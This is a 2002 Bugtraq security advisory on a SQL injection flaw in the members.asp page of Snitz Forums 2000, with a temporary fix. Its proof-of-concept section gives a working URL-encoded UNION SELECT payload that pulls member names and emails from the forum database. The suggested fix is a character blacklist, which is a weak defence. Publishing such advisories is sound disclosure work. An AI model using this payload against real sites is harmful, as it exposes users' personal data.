[25183] in bugtraq
Snitz Forums 2000 remote SQL query manipulation vulnerability
daemon@ATHENA.MIT.EDU (acemi)
Fri Apr 19 19:23:50 2002
Date: 19 Apr 2002 21:06:46 -0000
Message-ID: <20020419210646.23194.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: acemi <acemi_5@yahoo.com>
To: bugtraq@securityfocus.com
vulnerable
----------
Product : Snitz Forums 2000
Version :
3.3
3.3.01
3.3.02
3.3.03 (last stable version)
Object : members.asp
Class : Input validation error (remote SQL query
manipulation vulnerability)
Vendor-URL : http://forum.snitz.com/
Vendor-Status : informed, not patched
Remote-Exploit : yes
Introduction
------------
Snitz Forums 2000 is open source ASP-based web
forum software. It runs on Microsoft Windows
operating systems. A vulnerability exists in Snitz
Forums 2000 which makes it possible for a malicious
user to remotely manipulate the logic of SQL queries.
As a result, it may be possible for attackers to view all
data in the forum's database. This vulnerability can
be exploited with a web browser.
More Details
------------
In members.asp page, when listing the members
with a criteria, the input (M_NAME) is not checked for
malicious code. As a result, an attacker can add
extra SELECT statement to the query with UNION
and he/she can view any data in the forum's
database.
Proof-of-concept
----------------
Normally, to view the members' list whose
membername start with 'A', members.asp page is
used as the following:
/members.asp?
mode=search&M_NAME=A&initial=1&method=
Use this link to view the vulnerability:
/members.asp?mode=search&M_NAME=XXXX%
25')%20UNION%20SELECT%20MEMBER_ID,%
20M_STATUS,%20M_NAME%20%2B%20'/'%20%
2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%
20M_EMAIL,%20M_COUNTRY,%
20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%
20M_AIM,%20M_TITLE,%20M_POSTS,%
20M_LASTPOSTDATE,%20M_LASTHEREDATE,%
20M_DATE,%20M_STATE%20FROM%
20FORUM_MEMBERS%20WHERE%20(M_NAME%
20LIKE%20'&initial=1&method=
MEMBERNAME column will be
MEMBERNAME/EMAIL/ column.
Temporary fix
-------------
To fix this bug, in members.asp , change the
following lines :
SearchName = Request("M_NAME")
if SearchName = "" then
SearchName = Request.Form("M_NAME")
end if
with :
if IsValidString(Request("M_NAME")) then
SearchName = Request("M_NAME")
end if
if SearchName = "" then
if IsValidString(Request.Form("M_NAME")) then
SearchName = Request.Form("M_NAME")
end if
end if
and in function IsValidString(sValidate) in
inc_functions.asp , change the following line:
sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"
with :
sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"
